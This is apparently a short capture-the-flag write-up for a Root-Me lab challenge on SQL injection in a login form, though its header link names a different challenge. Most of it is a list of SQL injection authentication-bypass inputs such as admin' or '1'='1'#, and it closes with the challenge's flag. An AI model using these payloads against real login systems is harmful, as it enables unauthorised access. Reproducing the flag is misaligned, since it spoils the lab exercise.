https://www.root-me.org/en/Challenges/Web-Server/Remote-File-Inclusion

SQL injection - authentication

[Soal]

Retrieve the administrator password

http://challenge01.root-me.org/web-serveur/ch9/

[POC]

username : admin' --
password : admin' --

username : admin'/*
password : admin'/*

username : admin' or '1'='1
password : admin' or '1'='1

username : admin' or '1'='1'--
password : admin' or '1'='1'--

username : admin' or '1'='1'#
password : admin' or '1'='1'#

username : admin' or '1'='1'/*
password : admin' or '1'='1'/*

#Flag = t0_W34k!$
